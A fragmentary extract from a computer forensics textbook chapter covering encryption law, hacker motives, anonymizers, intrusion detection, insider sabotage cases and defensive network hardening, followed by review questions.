named for its creators, Ronald Rivest, Adi Shamir, and Leonard Adleman of the
Massachusetts Institute of Technology, Cambridge
...
At present, a key length of at least 1,024
bits is generally held secure enough
...

The Diffie-Hellman public key algorithm is used mostly for exchanging
keys
...
The algorithm is generally viewed as secure if long enough keys and proper key generators are used
...
PGP was created in 1991 by a programmer and activist named Philip Zimmermann as a means of protecting email
...
S
...
The
case against him was eventually dropped in 1996, after which Zimmermann started
a company to market PGP
...
, of Santa Clara, California, although freeware versions continue to be available from the Internet
...
At issue is
whether, and to what extent, persons and organizations should have the ability to
encrypt information that the state cannot decipher
...
The international group Human Rights Watch, for example, regularly encrypts eye-witness
reports of serious abuse, gathered in parts of the globe where the victims may be
subject to further reprisals
...
In an effort to keep encryption from gaining ground, many countries have passed laws criminalizing its import, export, and use
...

The proliferation of encryption has coincided with the explosive growth of the
Internet
...
In essence, the simultaneous spread of
encryption and the Internet has amounted to a transfer of power to the individual
...
An interesting case is the People’s Republic of China
...
Repeated attempts by the authorities to shut down the group have largely
failed
...
It further banned the sale of foreign-designed encryption products
...

China’s unwavering opposition to encryption suggests a more fundamental
reason why a government (any government) would want to control the technology:
to preserve the ability to exercise censorship
...
Conversely, when citizens can communicate freely and privately using
encryption, censorship becomes unenforceable
...
It’s like having two rude guests at one’s dinner table who keep
whispering in each other’s ears
...
S
...
Until 1996,
strong encryption technology was listed as a munition, and until just recently, it fell
under the same export restrictions as advanced weaponry
...
S
...
Even so, every encryption product must
still undergo a one-time review by the U
...
Commerce Department’s Bureau of Export Administration before it can be exported; sales to the so-called terrorist five
(Cuba, Iran, North Korea, Sudan, and Syria) are still excluded
...

What’s more (although encryption proponents have largely welcomed the relaxation of export rules), another concern has been raised: the same legislation
would grant law enforcement new powers, such as the right to present a plaintext
in court without disclosing how it was obtained from a suspect’s encrypted files
...

Other Legal Responses
The United States is not alone in backing away from strict encryption bans
...

Generally speaking, laws pertaining to encryption are quite convoluted and rife
with exceptions and qualifications
...

The first international attempt to control encryption was made by the 17-country Coordinating Committee for Multilateral Strategic Export Controls (COCOM),
which came together in 1991 to restrict the export of items and data deemed “dangerous” if acquired by particular countries
...
One such item was Global System for Mobile Communications (GSM) cellular

Advanced Computer Forensics

639

telephony [3], which has two grades of encryption
...

Both grades of encryption have since been broken
...
Under the nonbinding agreement, countries agreed to restrict the export of mass-market software with keys longer than 64 bits
...

Do such encryption bans work? In a word, no
...
What’s more, sophisticated techniques for hiding data, unencrypted or not, are now readily available and
extremely hard to detect, so that prosecution of cryptography-ban violations is all
but impossible
...
In most,
though not all, countries, a sender can log onto any public computer connected to the
Internet, such as those in public libraries or Internet cafés and send encryption software anonymously to a recipient, who can also retrieve it anonymously
...

It may make sense for a country to ban the exportation of something that it
alone possesses and that could be used against it, but it makes no sense for a country to ban the export of what other nations already produce locally
...

The study, published before the latest relaxing of U
...
export laws, explains that
on average, the quality of foreign and U
...
products is comparable and that in the
face of continuing U
...
export controls on encryption products, technology and
services, some U
...
companies have financed the creation and growth of foreign

640

Computer Forensics, Second Edition

cryptographic firms
...
S
...

Nevertheless, in recent years, the war over encryption has moved beyond the
mere control of the technology itself
...

These efforts are in turn being met by ingenious new schemes for hiding and protecting information, including one’s identity
...
The consequences could be ruinous
...
4 million each
...

One of the best places for plant engineers to learn about network security (see
sidebar, “Hack Yourself Before Somebody Else Does”) with a peer in information
technology (IT) is at the Computer Security Resource Center, a Web site
(http://csrc
...
gov/) established by the National Institute of Standards and Technology (NIST)
...

More than ever, it’s vital that plant engineers work effectively with IT to identify
potential breaches, shore them up, and train everybody to be security conscious
...
In addition, you
should ensure that you only run the services you need and only open the ports
needed by your network
...
You should also set up
Windows Update notification for the server and have a backup server ready when
you need to run the update
...

The main thing is to regularly test the security yourself; then you know what to find
solutions for
...
The National Infrastructure Protection Center (http://www
...
gov/) was created by Congress to defend the nation’s
computer networks by serving as the national focal point for gathering information
on threats to critical infrastructures
...
The center issues updates
about new viruses, Internet frauds, and disruption attempts almost daily
...

Cybersecurity isn’t an exclusively local matter, however
...
S
...
The complaint alleged that Oleg Zezov and Igor
Yarimaka, residents of Kazakhstan, penetrated the computers of Bloomberg
...

Bloomberg agreed to pay, but only following a face-to-face meeting in London
...
They repeated their demands, and police arrested them the
next day
...

In view of the preceding incident, computer intrusions have more than tripled
in the past two years
...

Are We a Hacker Nation?
Shadowy, computer-wise predators slip in undetected to steal data, deface Web sites,
crash systems, or just look around
...
Yesterday’s hackers are today’s security gurus, with
more corporations counting on them for protection
...

Tools of the Trade

The Internet is filled with Web sites that offer tips and tools for the neophyte
hacker
...
The
barrier to entering the hacker world has become very low
...

Despite tighter Web security and stricter penalties for breaking into systems,
hacking attacks have more than tripled in the past two years
...
To avoid negative publicity, most
companies don’t report attacks
...

The FBI estimates that businesses worldwide lost $5
...

The risks are personal and professional: hackers can steal passwords and bank
account numbers from your home PC or grab trade secrets from your company
network
...


FUTURE THREAT: ADVANCED MALICIOUS CODE IN SOFTWARE
Malicious code embedded in software is not new; users have always run the risk of
downloading a virus or a trojan horse with shareware and games from the Net
...

Although Microsoft indicates its code was not altered (the code was compared
with previous backups) it’s possible that a criminal hacker could get into a software
manufacturer’s code and insert a trojan horse
...


Advanced Computer Forensics

643

Hacking also poses risks for national security—sophisticated terrorists or hostile governments could conceivably crash satellite systems, wage economic warfare
by interfering with financial transfers, or even disrupt air traffic control
...
Some hackers work for companies to secure their systems, and some contribute to security by notifying software vendors
when they spot a vulnerability
...
Building a solution is difficult,
but arguably more fulfilling, but for every hacker who swaps his black hat for a white
one, dozens of others continue to keep governments and companies on their toes
...
Bad software is being written faster than vulnerabilities
are exposed
...
Face it: hackers are not going to go away,
so it’s worthwhile to know who they are and why they do what they do
...
The truth is that computer hackers for the most part are smart, bored kids
...
People in the underground indicate that not
all hackers are true hackers
...
The first hackers, who emerged at MIT in the 1960s, were driven by a desire
to master the intricacies of computing systems and to push technology beyond its
known capabilities
...
A hacker should pass through a network without
a trace
...

Hacker purists get riled when anyone confuses them with crackers—intruders
who damage or steal data, but although some hackers are quick to claim the moral
high ground, the line between hacker and cracker is often blurred
...
The
law, of course, thinks otherwise
...


644

Computer Forensics, Second Edition

T12, a 20-year-old who admits to some questionable hacking conduct, indicates
he wouldn’t normally damage a site, but if a phone company were to illegally switch
his long-distance carrier and start billing his calls at $10 a minute, he wouldn’t hesitate to take action
...

Diablo, a teenager with the Romanian hacking group Pentaguard, indicates
that a hacker should never abuse his or her powers, but if you penetrate a server and
change the main page, nobody is hurt
...

Pentaguard has defaced more than 100 Web sites (most of them governmentand military-related) and Diablo indicates that he’s careful: he never deletes or
steals data and never crashes the system
...

Signs of the Times
Hacking has definitely changed in the past 43 years
...
They say new
hackers today are often younger and less skilled than their predecessors and more
likely to focus on showy exploits than the noble pursuit of knowledge
...
Ten years ago, hackers respected information and machines and had to possess knowledge and skills to
hack
...

Script kiddies receive the bulk of hacker disdain
...
The risk here is that an unskilled hacker could release wanton mayhem in your systems
...
But script kiddies tend to disappear after a
year
...

Bigger Threats
Script kiddies may get attention, but experts agree that the most dangerous hackers are the ones who don’t make any noise: criminal hackers and cyberterrorists
...

Hacking has evolved into professional crime
...
These are people
like the Russian cracker group that siphoned $20 million from Citibank in 1994 and
the mafia boss in Amsterdam who had hackers access police files so he could keep
ahead of the law
...
Now, with so
many easy-to-use hacking tools on the Internet, criminals hardly need hackers to
do their dirty work
...

The Department of Defense indicates its systems are probed about 583,000 times a
year
...
Regardless, authorities have to
investigate every probe as a potential threat
...
A more
problematic assault would focus on utilities or satellite and phone systems
...
S
...

An attack on these systems could impede military communications
...
The Navy indicates that the source code was an
unclassified older version
...
Members of terrorist groups such
as Hezbollah have been educated in Western universities and are capable of developing such attacks in the future—such as a digital 9-11 attack
...
Despite the image of hackers as dysfunctional loners, many are drawn to hacking by the sense of community it gives
...
A hacker called Dead Addict once
described the high that comes from discovering valuable information, followed by
the low that comes from realizing you can’t do anything with it
...
He says that he once broke
into a hazardous waste firm and found pretty evil insider information that no one

646

Computer Forensics, Second Edition

was meant to see
...

Many hackers who begin as system voyeurs graduate to more serious activities
...
Most hackers are not old enough
to drive a car or vote, but they can exert power over a network
...
Life fills their time and their ethics begin to change
...
You only have three directions to go with hacking: you
can keep doing the same old tricks, you can become a real criminal cracker, or you
can use those skills wisely to build new software and create a more secure Internet
...
They lament that the public never hears
about their positive acts, such as patching a hole on their way out of a site and letting the administrator know they fixed it
...
It’s made hackers
reluctant to help them
...
These are findings about a security problem that hackers (and
researchers) post on the Net
...
The
hacking community frowns on people who don’t notify vendors, but when they do,
vendors often ignore them
...
Then they have to fix it
...
Hackers, on the other hand,
force vendors to admit their errors after they’ve hacked into their software
...
What if they
were producing cars that were this unsafe? The software they give us is not safe to
drive in cyberspace
...
Better security is in everyone’s best interest, and hackers should play a crucial role in this
...
The same thing that makes them hackers makes them valuable to employers in the future
...
The

Advanced Computer Forensics

647

network that can’t guard against a bored 18-year-old hacking in his or her spare
time, can’t hope to protect itself from a hostile government or tech-savvy terrorist
...
These are the data detectives who search for digital clues remaining on computers after malicious (or
black-hat) hackers have done their dirty deeds
...

It’s not only the number of crimes that’s fueling the need for these skills but
also the increasing sophistication of criminals
...
That means that both e-businesses and law enforcement
agencies are paying plenty to find experts to sift through evidence left behind at digital crime scenes
...
In a recent survey of more than
11,000 IT managers, security consultants, on average, make $20,000 more per year
than network administrators
...
9% to an average of $109,176 in 2004 (see Table 20
...

TABLE 20
...
7%

Security auditors

$110,722

+26
...
9%

System administrators

$108,313

+44
...
1%

The need for computer forensics is growing exponentially
...
An increasing number of corporations are
using computer forensics to resolve internal matters such as fraud, violations of
trade secrets, and inappropriate use of company computers
...
Most specialists
have years of programming or computer-related experience, strong analytical skills,
and the patience to invest days taking apart a computer in search of evidence
...

Other professional attributes needed to catch a thief are strong computer science fundamentals, a broad understanding of security vulnerabilities, and strong
system administration skills
...
The number and complexity of intrusions
has increased at an alarming rate
...

Experts gather this data and create an audit trail for criminal prosecutions
...
Most cunningly of all, they set traps using vulnerable computers
to lure malicious hackers into giving away themselves and their techniques
...
That’s because they’re required to document their findings in detail, and they often testify at criminal trials
...
The International Association of Computer Investigative Specialists, based in Donahue, Iowa, offers certification for computer forensics examiners
...
Such courses are helpful for IT managers or individuals who lack computer programming experience but who want to make the leap into computer forensics
...
The specialty is a tough discipline in a fastmoving industry that requires highly trained professionals dedicated to continued
learning
...
White-hat hackers at this point can only try to narrow the gap between themselves and the bad
guys—and hope that the black-hat hackers don’t get too fastidious when it comes
to leaving behind digital footprints
...


Advanced Computer Forensics

649

That inequity—highlighted during the Forensic Challenge, a contest of digitalsleuthing skills whose results were announced recently—underscores the costs of
cleaning up after an intruder compromises a network
...

Eventually, the members of a loose group of security experts known as the Honeynet Project, announced the winner of the Forensic Challenge
...

Each digital detective used decompilers, data recovery programs, and other
forensic tools to uncover as much information as possible
...
The winner
of the contest, Thomas Roessler, a student in mathematics at the University of Bonn
in Germany, has dabbled in, but not done digital forensics work in the past
...
You always miss something
...
In
fact, the detectives produced several leads to the identity of the culprit
...
Such on-line vandals are
extremely common
...
It’s a threat that everyone faces
...

The contest also helped illuminate why securing a computer is more cost-effective than hiring consultants to come in and do the detective work afterward
...
The costs of such investigations can easily
amount to $63,000 per computer
...
Companies
also tend to balk at agreeing to that kind of expense when there is no guaranteed payoff
...

If you just reinstall the system, do you know if you have plugged the hole that
allowed the attacker to get in? Most of the time, such quick fixes just mean the attacker
gets another shot at the system
...
Multiple intrusions are occurring all over the place
...
The next project would also focus on either a Solaris or Windows NT/2000,
XP, or 2003 computer
...
One of
these is legislation that increases the ability of federal agencies to intercept Internet
traffic
...

Web anonymizers allow people to visit Web sites without disclosing their identities to the owner of the Web site, or even a local administrator who can log the
URLs that a user visits
...

Anonymity has its place in a free society, and personal rights and freedoms
shouldn’t be collateral victims of terrorist attacks
...
This section explains how
anonymization works on the Internet and why this is important in the face of increasing privacy concerns
...
When the
packet is received, the source address becomes the destination address in the reply
packet
...
Worse, spoofing your source address is a lousy technique for anonymity, as most application protocols require a
completed transmission control protocol (TCP) connection before exchanging any
information
...
Most firewalls translate internal addresses
into external addresses, most commonly through network address translation
(NAT)
...
This capability is built into Web
browsers, which permits you to specify the IP address and the proxy you wish to
use
...
The proxy relays for you transparently
...
And
the owner of the Web server still has information about you—for example, the type
of Web browser you’re using, the source IP address, the URL requested, any referring page, as well as the source operating system, and sometimes the type of PC
...
This information may include
your system’s real source IP address, which is accessible to Javascript programs
...
S
...
This research
formed the basis for the Freedom Network and may show up in other systems for
anonymity as well
...
You connect to this server via secure sockets layer (SSL) so
that anyone sniffing the connection can only see that you’re visiting an anonymizer,
and not your final destination site, which is encrypted
...

In the early 1990s, a site in Finland, anon
...
fi, provided an anonymous remailer
...
That works well as long as the
software manages to remove all the headers and you don’t include revealing information in the email you send (for example, including an automatic signature file at
the end of your email that, consequently, identifies you)
...
Therefore, Penet had to keep
track of the mapping between your anonymous email address and your real one
...

If the proxy doesn’t even know your real source address, how can it successfully
relay for you? There have been several approaches to this problem, and one of the
most recent (as previously discussed) is Onion Routing
...
Each of these proxies runs the same software, which not only relays your packets but also encrypts them
...

This is where the “onion” comes in
...
Once this layer of encryption is removed, the packet is sent to its real
destination
...
This
layer includes the address of the last router in the list, and gets encrypted with the
second to last router’s key
...

There should be at least six routers to ensure confidentiality
...
Your Onion
Router must also be a full participant in the network, so that other Onion Routers
can use it
...

Onion Routers present another potential problem
...
This attacker (or snoop) can then track traffic patterns
...
fbi
...
The snoop sees traffic leaving
your Onion Router, bound for another Onion Router, with a certain packet size
...
Then the snoop can deduce that this packet came from your network, based on the sizes and the timing of
the packets between routers
...
Thus, a snoop cannot make simple deductions about the size
and timing of packets
...

Onion Routing is only one approach to the problem of network anonymity
...
research
...
com) tried a different approach called
Crowds
...
Each Crowd proxy is called a “jondo” (think “John
Doe”)
...
This speeds up processing by reducing the amount of time required to handle encryption
...
This information is discarded at the end of each connection
but could be used to track users
...
You could
either add a plug-in to Internet Explorer or patch your Linux kernel so that your system actually becomes an entry point in the network, with sites other than the one
run by ZeroKnowledge participating as routers
...


Advanced Computer Forensics

653

As of this writing, the Anonymizer (http://www
...
com) is still up and
running but functions as a proxy; it also strips identifying information from your
requests
...

You can also acquire software that acts as a local proxy for Web requests
...

Who Needs It?

The Onion Routing project closed down in January 2000, after processing over 30
million requests
...

Still, government agencies form one of the largest groups of anonymizer users
...

Such uses of anonymizers are legitimate and actually of value to national security
...

Anonymizers also have a place for nongovernmental users
...
For example, someone with AIDS could
feel free to search the Web without revealing his or her identity
...
One can only hope that the
rush to embrace national security in the United States doesn’t have additional casualties—especially ones that actually enhance national security
...
Perhaps no other security device has
done its job so well and then been reviled so roundly for doing it
...
That was both bad and good news
...
This required placing IDSs at key locations
on the network, such as at firewalls, switches, routers, Web servers, databases, and
other back-end devices further into the enterprise—a straightforward process
...
They cried “wolf”
too often, reporting false alarms by the droves
...

The IDS products on the market are now bigger, better, and faster and offer much
more to those charged with protecting network resources
...

They have also increased the performance of their devices, which can now keep up
with 100 Mbit/sec networks
...

Just as importantly, the number of attacks on networking systems is growing
...
For example, the nonprofit CERT
Coordination Center received reports on 44,304 security incidents in 2004 (the
most recent year for which its incident totals are available)
...

The most virulent threat to emerge from the hacker jungle, though, is clearly
DoS and distributed DoS (DDoS) attacks, the number and variety of which have increased dramatically according to security organizations
...
The goal of
such attacks is to incapacitate a device or network with bandwidth (devouring traffic so that external users can’t access those resources)—this without hacking password files or stealing sensitive data
...
NIPC identified 500 victims in 33 U
...
states who were attacked by organized groups in
Eastern Europe (particularly Russia and the Ukraine), which took advantage of
vulnerabilities in servers running an unpatched version of Microsoft’s Windows
NT operating system
...
In this case, the intruders didn’t use the information maliciously,
per se, because they didn’t attempt to make purchases with the stolen cards
...


Advanced Computer Forensics

655

A Second Look

It’s thus time for network professionals who gave up on the IDS a few years ago to
go looking again
...
Frost & Sullivan, for example, predicts that the market for intrusion detection software will increase from $665
...
8 million in 2006 and $998
...
Another research house, IDC (http://www
...
com), paints a slightly rosier picture, saying that
the IDS market stands at $1 billion in 2005 and will grow to $5
...

Several developments have moved the IDS back into prominence
...
The charge is led by many of the usual vendor suspects—Cisco Systems [5], Internet Security Systems (ISS), Intrusion
...
The latter list includes
CyberSafe, Entercept Security Technologies, and Enterasys Networks
...
In this area are Activis, Exodus Communications, OneSecure, NetSolve,
RedSiren Technologies, Riptech, and Ubizen
...
Arguably, the most critical is the growing use of anomaly-based
intrusion detection by vendors of network-based IDSs
...
” These
systems work much like an anti-virus software package (detecting a known “bad”
pattern generates an alarm) and effectively discover known patterns
...
First, they can’t see inside encrypted packets—the encryption essentially
hides the packet’s contents from the IDS, leaving it blind to assaults
...

Just as an anti-virus package can’t protect against a new virus until vendors patch
their software, an IDS vendor must update its signature files—and it’s not clear
how many vendors have figured that out
...


656

Computer Forensics, Second Edition

These devices analyze the data transfer among IP devices, permitting them to discern normal traffic from suspicious activity without pattern or signature matching
...
They only care about how a session took place, where the connection was made, at what time, and how rapidly (is a suspicious connection to one
host followed by a suspicious connection to another host?)
...
The chief difficulty of this approach is how to baseline—
to know what’s normal traffic as opposed to deviated
...
An anomaly can be compared against a signature, and if the anomaly doesn’t show up on multiple probes, you ignore it
...
com, ISS, and Recourse Technologies are among the vendors that offer anomaly-based network IDS products
...
Beyond
that, they begin to drop packets and become less efficient
...
You can find products that will die in 400 Mbit/sec networks
...

Moving to Appliances
Another trend among IDS products is the network-based IDS appliance
...

Cisco’s Secure IDS, formerly known as the NetRanger, was among the first
such appliances, and IDC believes this makes Cisco the current leader in this area
...
com, and NFR Security (formerly Network
Flight Recorder), are also moving their IDS products into the appliance category
...
First, it eliminates many
of the performance issues involved in installing IDS software on a general-purpose
PC
...
Second, the appliance is a controlled environment, built to
vendor specifications, so the IDS software can be configured specifically for the application
...
Finally, appliance-based IDSs
give plug-and-play capabilities to IT departments in multilocation companies and to
service providers
...

IDS vendors have developed recent products that merge the capabilities of
host- and network-based systems into a single management platform
...

Correlating data from multiple network sources lowers the incidence of false positives and enables network security personnel to view traffic from a higher level
...

Outsourcing Intrusion Detection

Advances in IDS technology notwithstanding, organizations worried about unauthorized intrusions and DoS attacks should also consider outsourcing their intrusion detection needs
...
Not the least
of these is cost
...
It would typically require five employees,
working three eight-hour shifts (with extra staffing for vacations, sickness, and the
like), to handle the 24-by-7 needs of an IDS-monitoring program
...

Thus, it’s important to sit down and perform a return on investment (ROI)
study
...

The MSSPs tout the level of security expertise among their employees, claiming that this expertise enables them to better handle the task of deciphering often
arcane IDS logs and alarms that befuddle typical IT employees
...
MSSPs Riptech and
OneSecure, for example, both indicate that the technology they’ve developed in this
area differentiates them from others in the market
...
Caltarian’s software permits
the company to warn clients of attacks while they’re under attack, with recommendations to protect their networks in real time
...
No longer an overly chatty box
crying “wolf” too often, it now offers network managers an improved set of tools that
can finally help them fend off unwanted attacks from insiders and outsiders alike
...
Computers at many
agencies are riddled with security weaknesses
...

The increase in the number of root compromises, DoS attacks, network reconnaissance activities, destructive viruses, and malicious code, coupled with the advances in attack sophistication, pose a measurable threat to government systems
...
That’s up from 186 root compromises in 2002 and
332 in 2003
...

For at least five of the root compromises, officials were able to verify that access
had been obtained to sensitive information
...
The compromised data involves scientific and environmental studies
...
S
...
The
shortcomings have placed an enormous amount of highly sensitive data at risk of
inappropriate disclosure
...
If sensitive personal data about U
...
citizens is compromised, Americans are going to wake up angrier then you can possibly imagine
...
Also, many nations are developing information warfare capabilities as well as
adapting cyber crime tools
...
There is a whole new currency on the Internet that’s called the back door
...

One step the government could take to increase the security of its systems is to
focus more resources on improving education and training
...
They are in short supply, and they are expensive
...

A 1998 directive by President Clinton, ordered all federal agencies to complete
a virtual bulletproofing of their IT systems from attack by May 2005, but officials
indicate that most agencies are behind in that work, and only a few are doing penetration testing
...
No one knows what
was done, and no one has a way of knowing what was done
...
Beyond fending off network intrusions and DoS attacks, companies must stave off threats of industrial espionage
...
Increasingly,
cyberthieves are raiding corporate servers, electronically stealing intellectual property, and using email to harass fellow employees, putting companies at risk for liability
...
9 billion annually
...
For many organizations, identifying, tracking, and
prosecuting these threats has become a full-time job
...
As previously explained, computer forensics is
the equivalent of surveying a crime scene or performing an autopsy on a victim
...

Although software tools can identify and document evidence, computer forensics is more than just technology and analysis
...

Divining Good Forensics

Obtaining a good digital fingerprint of a perpetrator requires that steps be taken to
preserve the electronic crime scene
...
Even booting up or shutting down a system runs the risk of
losing or overwriting data in memory and temporary files
...
Minimal handling preserves its integrity, so any disk investigation should begin by making a
copy of the original, using the least intrusive manner available
...
Ambient system data, such as swap files and unallocated
disk space, and file “slack” (data padded to the end of files), often hold interesting

660

Computer Forensics, Second Edition

clues, including email histories, document fragments, Web browsing details, and
computer usage time lines
...
Complying with the rules of evidence preservation and upholding the integrity of the process will help prevent any future challenges of admissibility
...
Data communication analysis typically includes network intrusion detection, data preservation, and event
reconstruction
...
Doing so can reveal activities such as unauthorized network access, malicious data-packet monitoring, and any remote system
modifications
...
And no matter how
good the tools, the science of computer forensic discovery draws on multiple disciplines
...
Principals of cryptography
are also important for identifying data encryption and password-protection
schemes
...

For these reasons, it’s often wise to leave the process to the professionals
...

When selecting a forensic examiner, you should have several goals in mind:
Your candidate should be familiar with the intricacies of your particular operating
systems, know how to protect against data corruption and booby traps, and have a
history of court appearances and controls established to deal with evidentiary procedures, such as chain-of-custody
...
As storage capacities and network sizes continue to increase, so do
the means by which cyberthieves can circumvent security as well as the effort required to bring them to justice
...


Advanced Computer Forensics

661

How a Hacker Works
Obviously, knowing how the hacker’s mind works is only half of the battle
...
This section will look at some tips and tools
administrators can use to prevent those vulnerabilities
...
You can do this
with a sophisticated tool such as Visio, or you can use a less complex tool such as
Word
...
Once you’ve diagrammed your network, identify all the machines that are connected to the Internet, including routers,
switches, servers, and workstations
...
You want to pay close attention to machines that have a public
IP address on the Internet, because they’re the ones that will be scanned by hackers
...
With always-on access and a static IP, you are a like a big bull’s-eye
sitting on the Internet waiting to get hit
...
If you have a Web server,
mail server, or other servers constantly connected to the Internet, your security responsibilities are even greater
...
A number of common ports are scanned and attacked:
FTP (21)
Telnet (23)
SMTP (25)
DNS (53)
HTTP (80)
POP3 (110)
NNTP (119)
IMAP (143)
SNMP (161)
You need to identify whether your servers are utilizing any of these ports (the numbers above in parentheses) because these represent known vulnerabilities
...
First, you can
implement firewall filtering
...
” These firewalls open and close ports on an as-needed basis, rather than
permanently leaving a port open where it can be identified by one of the hackers’
port scans and then exploited
...
A third option is to install an intrusion-detection program that will
do much of the log file examination for you
...
The best way to do this is to use nmap,
a program that gives you a look at your network from a hacker-like perspective
...
eeye
...
html)
...
This is an
expensive, yet valuable, product
...
insecure
...


Software Vulnerabilities

Hackers also often exploit software security problems
...
Thus, you
should take stock of all the software running on your Internet-exposed systems
...
You’ll want to check
these sites regularly and always keep your software up-to-date with the latest
patches
...

Security Expert Web Sites

In addition to staying on top of your vendors’ security updates and patches, you
should also stay current on the security risks and problems that are identified by security experts in the industry
...
Therefore, your systems could be vulnerable for a period
during which the hackers may know about it, but you don’t
...
atstake
...
403-security
...


Advanced Computer Forensics

663

THE PROBLEMS OF THE PRESENT
An IT worker faced federal criminal charges recently in U
...
District Court in
Miami for allegedly downloading a virus into his employer’s computer system,
crashing the network for nearly two full days
...
Another case is getting ready to go to trial in Las Vegas, and yet
another was wrapped up with a guilty verdict in New Hampshire (see sidebar, “Insider Accounts”)
...
7 million workers were
laid off according to the U
...
Even scarier is the question of
how many of those workers still have active accounts on the networks of their former employers
...
There are
also remote access holes with virtual private network (VPN) passwords and dial-in
accounts
...

A recent series of high-profile network sabotage cases show that vengeful
employees can wreak high-tech havoc
...
Security experts recommend a combination of procedures, policies, and
automation to combat the threat
...
If you are a chief information officer (CIO) and are currently using a manual process, fundamentally you have no way to know if the process of deprovisioning worked
...

However, the process must include social engineering
...
For example, there was one case where a former Coast Guard employee
was able to hack into a database using a password given to her by an unsuspecting
coworker
...

The U
...
Secret Service, which splits its focus between protecting heads of state
and conducting criminal investigations, is handling twice as many cases that involve insider attacks than occurred in 2004
...


664

Computer Forensics, Second Edition

Eighty-three percent of the cases are from the inside or people who were formerly with an organization
...
It’s not at matter of if you’re going to be
attacked, but when you’re going to be attacked
...
An insider attack really gets the attention of the company, because an insider has access to all the critical systems
...
A company’s decision to protect itself isn’t just a technology decision
...

Grocer Victimized
In the Miami case previously mentioned, Herbert Pierre-Louis, a hardware engineer who worked in the IT department at Purity Wholesale Grocers, is being
charged with computer sabotage for the June 18, 1998, incident at the $2
...
The Assistant U
...
Attorney
indicated the damage was well over the $6,000 waterline that is one of the key factors making this a federal crime
...
In light of the economy and the downturn and layoffs, companies should pay
attention to this
...

That’s a lesson Omega Engineering’s Bridgeport, New Jersey, manufacturing
plant learned the hard way
...
Exacerbating the problem, Omega’s
only backup tape was missing
...
Company executives, in a 2001 trial in U
...
District Court in Newark,
New Jersey, indicated that the company had yet to fully recover
...

Omega’s former network administrator was charged with sabotaging the network he helped build
...
The judge later
set that verdict aside after a juror told the court she was unsure whether a piece of
information she had heard on television news had been factored into her verdict
...
A ruling is pending
...

That was the first federal criminal prosecution of computer sabotage
...
One of those cases charges
a network consultant with sabotaging the computer network at one of his clients,
Steinberg Diagnostic Medical Imaging in Las Vegas
...
The Assistant U
...
Attorney notes in
the indictment that the consultant allegedly hacked the system on three different
days between late February and early March of 2001
...
Both
the deal and the partnership fell through, and the consultant’s partner went to work
for Steinberg Diagnostic as a system administrator
...
The damage had to have added
up to at least $5,000 for the consultant to be charged with a federal offense
...
The worker pleaded guilty to
breaking into the system twice using a supervisor’s password (once the night he was
fired and again the next morning) to delete a total of 786 files, change user access
levels, and send emails to Bricsnet clients saying the company’s project center
would be temporarily or permanently shut down
...
Some of the destroyed files could not be restored
...
It
was malicious
...
How do you
quantify the impact when customers receive these kind of damaging emails? You can’t
put a dollar amount on that
...
They terminated the worker’s password, logon, and user accounts
...
There was no
sense of foreboding
...
Certainly, Bricsnet had an extensive
security system in place, but they were always thinking of outside intrusion
...
Since the attack, Bricsnet has
re-evaluated its security system and limited network access
...
People took it personally
...


666

Computer Forensics, Second Edition

Outlook for the Future
Atlanta-based Internet Security Systems Inc
...
That’s right—drive-by hackers
...
To combat this
threat, which sounds like it could be a plot line from an upcoming James Bond film,
ISS recently drew the curtain on wireless local area network (WLAN) security software and consulting practices
...
Very
little exists in the way of security for wireless networks as compared to their wired
counterparts, LANs
...
The research firm said 90% of all enterprises in the United States
will have deployed a WLAN by 2006, an increase from 50% in 2003
...

Just as perpetrators such as hackers and crackers have done to wired networks,
they can assault WLANs through the same methods: unauthorized access points,
data interception, DoS attacks, peer-to-peer sabotage, and wireless laptops to attacks when they roam to public access points such as airports and hotels
...
This ignorance can
make the comfort of the firewall a false security blanket
...
Employees today are adding their own wireless access points to the backbone of their company’s network without the knowledge of their IT and security
staffs
...


SUMMARY
This chapter introduced numerous solutions to those of you who are in the process
of conducting advanced computer forensics through the use of encryption for protection and hacking back with advanced hacker trackers
...
Not true
...
The intruder could be a teen hoping to use your system to launch an attack on a Web site,
or a bitter ex-employee looking for payback
...
The feast is seemingly never-ending
...
Think your firewall will protect you?
Not always
...

Furthermore, protecting your network against hackers need not be a full-time
job
...

Computer forensics provides the methodology for investigating and documenting cyber crimes so they may be later tried in court
...

Also, tools for sifting digital media and detecting network intrusion have become easier to implement, but they still demand a sizeable time commitment and
cross-discipline knowledge for most situations
...

Conclusions
Hackers often break into computers through well-documented holes (they read
security alerts, too) when users don’t install patches
...

This can happen when administrators forget to disconnect an ex-employee’s
system from the modem or network
...

A shared terminal that’s not attached to any one employee is often overlooked
when security updates are done
...

You encrypt important data on your server, but you neglect to encrypt remote
backups
...

Security is an ongoing task
...

Intrusion detection systems (IDSs) come in several forms, with the most commonly deployed called “host” and “network” systems
...

A host-based IDS is a piece of software that runs on a network-based computer—a Web or application server, for instance
...

Host-based systems are particularly valuable in monitoring insider threats because they can show when unauthorized personnel attempt to access prohibited data or resources
...

Network-based IDSs are generally “promiscuous” in that they look at every
packet on a network or network segment
...

A desktop IDS offers file-level protection
...

The desktop IDS is also very useful in trojan horse detection
...

Honeypots emulate known vulnerabilities, other systems, or are modified production systems that create “caged” environments
...
Once breached, the resulting information gathered during the attack is analyzed to learn about the tools, tactics, and
motives of the possible intrusion
...
1 in Appendix F is a provisional list of actions for advanced computer
forensics
...
A number of these advanced computer
forensics topics have been mentioned in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? Hackers often break into computers through well-documented
holes (they read security alerts, too) when users install patches
...
True or False? Hackers often enter networks through old computers that are no
longer in use
...

3
...

4
...

5
...

Multiple Choice
1
...
A
number of common ports are scanned and attacked, except:
A
...
Telnet (23)
C
...
INS (53)
E
...
Private citizens have legitimate reasons to do the following, except:
A
...
Protect flaws
C
...
Prevent legal or medical records from falling into strangers’ hands
E
...
You only have three directions to go with hacking, except:
A
...

B
...


670

Computer Forensics, Second Edition

C
...

D
...

4
...
Unauthorized access points
B
...
Denial-of-service (DoS) attacks
D
...
Peer-to-peer sabotage
5
...
Break into computers through well-documented holes (they read security
alerts, too) when users don’t install patches
...
Enter networks through old computers that are no longer in use
...

C
...

D
...

E
...

Exercise
A large financial institution routinely used a computer forensics specialist team
(CFST) to investigate corporate computer-usage policy violations
...
So, how
was the CFST able to go about conducting their investigations?

HANDS-ON PROJECTS
A large insurance company used a CFST for incident response activities and deployed the CFST on 36,000 machines within their organization
...
Organizations face many challenges and potential repercussions when terminating

Advanced Computer Forensics

671

employees
...
How did the CFS go about
conducting the investigation?
Optional Team Case Project
A large insurance institution uses a CFS to investigate suspicious insurance claims
